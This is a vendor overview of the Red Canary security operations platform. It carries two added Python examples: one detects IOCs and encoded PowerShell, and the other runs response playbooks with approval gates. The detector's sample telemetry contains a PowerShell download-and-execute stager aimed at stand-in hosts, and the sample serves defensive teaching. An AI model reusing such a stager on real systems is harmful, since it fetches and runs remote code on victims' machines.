What is Red Canary?
Red Canary provides a security operations platform that proactively monitors for malicious and suspicious behaviors and responds to stop them from becoming serious security incidents. The platform works via several key components:
- Endpoint and cloud workload sensors/agents
- Alert collectors and integrations with your alert-generating security products
- Integrations with your cloud service providers, identity platforms, and SaaS applications
- Cloud-hosted collection, detection, and response platform
- Our Cyber Incident Response Team (CIRT)
- Our Threat Hunting team
The endpoint/cloud workload sensors run on the endpoints and cloud workloads that make up your corporate and production environments, collecting detailed telemetry about what is happening in those systems.
The telemetry and alerts from your cloud service providers, identity platforms, SaaS applications, and other security products are all sent to our cloud-hosted platform. This allows our CIRT to analyze that data to identify and confirm suspicious activity and security incidents. The included security orchestration and response capabilities can execute automations using playbooks on endpoints for response and remediation.
Your Red Canary incident handler assists and coaches your team about ways to improve your security program and reduce your risk through reporting, prevention recommendations, and deeper integrations between your other security products.
Getting Started
Getting set up with the Red Canary platform typically takes less than one hour, depending on how your organization deploys software to your endpoints and the scope and complexity of your other systems. Once deployed, your organization is immediately protected by a highly advanced security operations team.
To get started, visit the onboarding pages for your subscription(s). Note that for the Red Canary platform to work, you must meet the requirements listed for each subscription:
- MDR Endpoints and MDR Networks: one or more of the following:
  - Purchase supported endpoint detection and response (EDR) software from a third party
  - Purchase supported third-party EDR software from Red Canary
  - Subscribe to the Red Canary Linux EDR component of the platform
- MDR Identities: integrate a supported identity platform technology with Red Canary
- MDR Cloud Control Plane: integrate a supported cloud service provider with Red Canary
- MDR Cloud Instance: one or more of the following:
  - Purchase supported endpoint detection and response (EDR) software from a third party
  - Purchase supported third-party EDR software from Red Canary
  - Subscribe to the Red Canary Linux EDR component of the platform
Detecting potential threats
Red Canary’s detection process uses two primary classes of analytics:
- Every piece of telemetry is tested to determine if it matches an indicator of compromise (IOC) that we’ve seen or heard adversaries use. These are brittle and often short-lived analytics, but if an adversary is foolish enough to reuse infrastructure or tools, they are easy to catch.
- Behavioral detectors identify sequences of system activity that match techniques used by adversaries. These could be as simple as running PowerShell with an encoded command line or a highly complex chain of behavior over a long period of time. We map every detector to MITRE ATT&CK® techniques so you can quantify your detection coverage.
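The two analytic classes above, shown as an added example that is not Red Canary's own code: a handful of constructed process-telemetry records are run through an IOC matcher (a known-bad hash and a known C2 domain) and two behavioral detectors (an encoded PowerShell command line, and an Office application spawning PowerShell), each mapped to an ATT&CK technique so coverage can be counted. The field names, IOC values, detector names and sample events are all assumptions made for illustration.

```python
"""Added example, not Red Canary code: IOC matching and behavioral detectors
run over constructed process telemetry. Field names, IOC values, detector
names and the sample events are assumptions made for illustration."""
import base64
import re
from dataclasses import dataclass, field
from typing import Callable, List, Optional, Tuple

# Constructed IOCs: a known-bad MD5 and a known C2 domain. Brittle by design:
# rebuild the binary or re-register the domain and neither ever fires again.
IOC_MD5 = {"9e107d9d372bb6826bd81d3542a419d6"}
IOC_DOMAINS = {"update-check.example.net"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
OFFICE = {"winword.exe", "excel.exe", "outlook.exe"}

@dataclass
class ProcessEvent:
    hostname: str
    parent: str      # parent process image name
    process: str     # process image name
    cmdline: str
    md5: str
    dns: List[str] = field(default_factory=list)  # names the process resolved

@dataclass
class Detection:
    hostname: str
    name: str
    technique: Optional[str]  # MITRE ATT&CK technique ID; None for raw IOC hits
    evidence: str

def ioc_analytics(ev: ProcessEvent) -> List[Detection]:
    """Class 1: exact match of telemetry against known indicators."""
    hits = []
    if ev.md5 in IOC_MD5:
        hits.append(Detection(ev.hostname, "Known-bad file hash", None, ev.md5))
    hits += [Detection(ev.hostname, "Known C2 domain", None, d) for d in ev.dns if d in IOC_DOMAINS]
    return hits

# powershell.exe accepts any unambiguous prefix of -EncodedCommand; this covers
# the abbreviations usually seen (-e, -ec, -en, -enc, -encodedcommand).
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")

def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script hidden in an -EncodedCommand argument, or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:  # PowerShell expects base64 over UTF-16LE; anything else is not an encoded command
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def encoded_powershell(ev: ProcessEvent) -> Optional[str]:
    return decode_encoded_command(ev.cmdline) if ev.process.lower() in POWERSHELL else None

def office_spawned_powershell(ev: ProcessEvent) -> Optional[str]:
    if ev.process.lower() in POWERSHELL and ev.parent.lower() in OFFICE:
        return f"{ev.parent} -> {ev.process}"
    return None

# Class 2: behavioral detectors keyed on what the adversary does, each mapped to
# an ATT&CK technique. A check returns its evidence when it fires, else None.
BEHAVIORAL_DETECTORS: List[Tuple[str, str, Callable[[ProcessEvent], Optional[str]]]] = [
    ("PowerShell encoded command", "T1059.001", encoded_powershell),
    ("Office application spawned PowerShell", "T1204.002", office_spawned_powershell),
]

def behavioral_analytics(ev: ProcessEvent) -> List[Detection]:
    hits = []
    for name, technique, check in BEHAVIORAL_DETECTORS:
        evidence = check(ev)
        if evidence is not None:
            hits.append(Detection(ev.hostname, name, technique, evidence))
    return hits

def attack_coverage() -> List[str]:
    """ATT&CK techniques that at least one behavioral detector covers."""
    return sorted({technique for _, technique, _ in BEHAVIORAL_DETECTORS})

def analyze(events: List[ProcessEvent]) -> List[Detection]:
    return [d for ev in events for d in ioc_analytics(ev) + behavioral_analytics(ev)]

def _enc(script: str) -> str:
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://update-check.example.net/a')"

# Constructed sample telemetry (not real data).
SAMPLE_EVENTS = [
    # Routine admin use of PowerShell: nothing fires.
    ProcessEvent("WS-01", "explorer.exe", "powershell.exe",
                 "powershell.exe -NoProfile -Command Get-Service", "0f343b0931126a20f133d67c2b018a3b"),
    # Macro-launched stager: both behavioral detectors and the domain IOC fire.
    ProcessEvent("WS-02", "WINWORD.EXE", "powershell.exe",
                 f"powershell.exe -nop -w hidden -enc {_enc(STAGER)}",
                 "5d41402abc4b2a76b9719d911017c592", ["update-check.example.net"]),
    # Same stager rebuilt with a new domain and launched by hand: only the
    # behavioral detector survives the change.
    ProcessEvent("WS-03", "explorer.exe", "pwsh.exe",
                 f"pwsh.exe -e {_enc(STAGER.replace('update-check', 'cdn-sync'))}",
                 "7d793037a0760186574b0282f2f435e7", ["cdn-sync.example.net"]),
    # Known-bad binary caught purely by hash.
    ProcessEvent("SRV-07", "services.exe", "svchelper.exe", "svchelper.exe",
                 "9e107d9d372bb6826bd81d3542a419d6"),
]

if __name__ == "__main__":
    for d in analyze(SAMPLE_EVENTS):
        print(f"{d.hostname:7} {d.technique or '-':10} {d.name}: {d.evidence[:60]}")
    print("ATT&CK coverage:", attack_coverage())
```

The WS-02 and WS-03 events make the brittleness point concrete: once the stager is rebuilt and pointed at a fresh domain, the hash and domain IOCs are silent, while the behavioral detector still fires because the adversary is still hiding the script behind -EncodedCommand.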
Unlike other security products, you do not need to define your own detection rules and indicators of compromise to get extremely effective results. From day one, you get the benefits of years of Red Canary detection engineering.
The Analyzed Events dashboard gives you an immediate view into the potential threats Red Canary is identifying in your organization using our threat intelligence and analytics. This page is where you’ll pivot into events if you want to learn more or check our work.
Learn more about how Red Canary detects threats.
Investigating potential threats
The Red Canary CIRT investigates every potential threat and excludes the false positives you're used to from other security products and services. Instead of the legacy approach of simply triaging alerts and forwarding them to you to deal with, Red Canary handles everything up to the point of incident response (some teams call this "tier 1" and "tier 2").
Threats in the Red Canary platform are classified as Unwanted Software, Suspicious Activity, or Malicious Software. Each threat contains the detail your team needs to assess the risk, which people and systems are affected, and the details of what happened.
Learn more about how Red Canary investigates and confirms threats.
Responding to threats
Reducing your time to response is one of our chief goals. Your time to respond is dependent on three activities:
- How long it takes to detect and confirm a threat (Red Canary does this for you).
- How long it takes you to receive the threat and decide how you want to respond.
- How long it takes you to respond.
When you start with the Red Canary platform, the first automation you’ll enable is notifications about confirmed threats via email, phone, SMS, Slack, PagerDuty, etc.
After a few days or weeks, most teams capture their decision-making and response processes (the second and third activities above) in configurable playbooks that are triggered automatically. Approval steps require manual intervention so you can check and approve each action before it is performed.
The peak of automation maturity is removing the approval safeties and allowing playbooks on endpoints to run without intervention. This enables high-quality response and remediation to take place regardless of where an affected system is located or what time of day it is for your security team.
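The three stages above, as an added example that is not Red Canary's own code: a minimal playbook runner that notifies on every confirmed threat, then runs a containment playbook that stops at an approval gate before isolating the host, and finally runs the same playbook with the approval safeties removed. The threat record, the action names, and the approval model (a set of approved action names, with resumption that never repeats an action already taken) are assumptions made for illustration.

```python
"""Added example, not Red Canary code: a minimal playbook runner showing
notification, a gated playbook, and the same playbook fully automated.
Threat fields, action names and the approval model are assumptions."""
from dataclasses import dataclass, field, replace
from typing import Callable, List, Optional, Set

@dataclass
class Threat:
    id: str
    hostname: str
    classification: str  # Unwanted Software | Suspicious Activity | Malicious Software
    severity: str        # high | medium | low

@dataclass
class Step:
    action: str
    requires_approval: bool = False

@dataclass
class Playbook:
    name: str
    trigger: Callable[[Threat], bool]
    steps: List[Step]

@dataclass
class RunState:
    triggered: bool = True
    executed: List[str] = field(default_factory=list)  # actions taken so far, in order
    pending: Optional[str] = None                       # action waiting for a human

def run(playbook: Playbook, threat: Threat, approvals: Set[str],
        previous: Optional[RunState] = None) -> RunState:
    """Run, or resume, a playbook against a threat.

    Execution stops at the first gate whose action is not in `approvals` and
    nothing after it runs. Resuming with `previous` continues from the step
    after the last executed one, so an approval never re-fires earlier actions
    (no duplicate notifications, no double isolation)."""
    if not playbook.trigger(threat):
        return RunState(triggered=False)
    state = previous or RunState()
    state.pending = None
    for step in playbook.steps[len(state.executed):]:
        if step.requires_approval and step.action not in approvals:
            state.pending = step.action
            return state
        # A real runner would call the EDR/ticketing/chat handler here.
        state.executed.append(f"{step.action}({threat.hostname})")
    return state

def without_approvals(playbook: Playbook) -> Playbook:
    """Stage 3: the same playbook with every approval safety removed."""
    return Playbook(playbook.name + "-autonomous", playbook.trigger,
                    [replace(s, requires_approval=False) for s in playbook.steps])

# Stage 1: notify on every confirmed threat, no gates.
NOTIFY = Playbook("notify-confirmed-threat", lambda t: True,
                  [Step("notify_slack"), Step("page_oncall")])

# Stage 2: containment for malicious high/medium threats, gated on a human
# approving host isolation; evidence collection waits behind that gate.
CONTAIN = Playbook(
    "contain-malicious-endpoint",
    lambda t: t.classification == "Malicious Software" and t.severity in ("high", "medium"),
    [Step("notify_slack"), Step("isolate_host", requires_approval=True),
     Step("collect_forensic_bundle")],
)

if __name__ == "__main__":
    t = Threat("THR-1", "WS-02", "Malicious Software", "high")
    paused = run(CONTAIN, t, approvals=set())
    print("paused at:", paused.pending, "after", paused.executed)
    print("resumed:", run(CONTAIN, t, approvals={"isolate_host"}, previous=paused).executed)
    print("autonomous:", run(without_approvals(CONTAIN), t, approvals=set()).executed)
```

The gate is deliberately a hard stop rather than a skip: if isolation is not approved, the forensic collection that depends on the host being contained does not run either, and the pending action is surfaced for a human to decide.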
Learn more about taking action on threats with automations.
Active Remediation for Endpoints
If you subscribe to the Red Canary Active Remediation for Endpoints add-on to the Red Canary platform, Red Canary will respond to high- and medium-severity threats identified by the Red Canary platform by taking remedial action on your covered endpoints via the tools available in your supported EDR software.
After subscribing, the Red Canary team will work with you to organize your covered endpoints into groups with your instructions as to how each endpoint should be handled in the event of a threat.
Linux EDR
Linux EDR is a Linux-based EDR sensor that is deployed to physical, virtual, or cloud-based systems. Linux EDR monitors these systems and returns telemetry to the Red Canary platform, where it is analyzed and investigated for threats through the normal process. Within the platform, customers can search their Linux EDR telemetry and manage deployed sensors.
Reporting on your performance
Every great security program continually improves over time, and Red Canary is focused on helping you understand how you’re doing.
Unlike the typical pie-chart-filled dashboards, Red Canary’s reporting library contains pre-built reports that are designed with help from your peers for inclusion in your executive and board presentations.
Learn more about how to get started with reporting.
Your ally in the fight
When an incident occurs, it is not always obvious what to do. The Red Canary team is on-call when you need help and provides proactive security architecture and engineering guidance. Most teams engage with threat hunting in three primary ways:
- Periodic sync: Your threat hunter joins a regularly scheduled meeting with your team to review recent detections, discuss security architecture, help with automation, and provide any other security guidance you need.
- Immediate assistance: Threat Hunting is on-call 24/7/365 for investigation support and remediation guidance.
- Proactive outreach: Our team will proactively communicate with your team if the Red Canary CIRT identifies a critical threat requiring immediate action.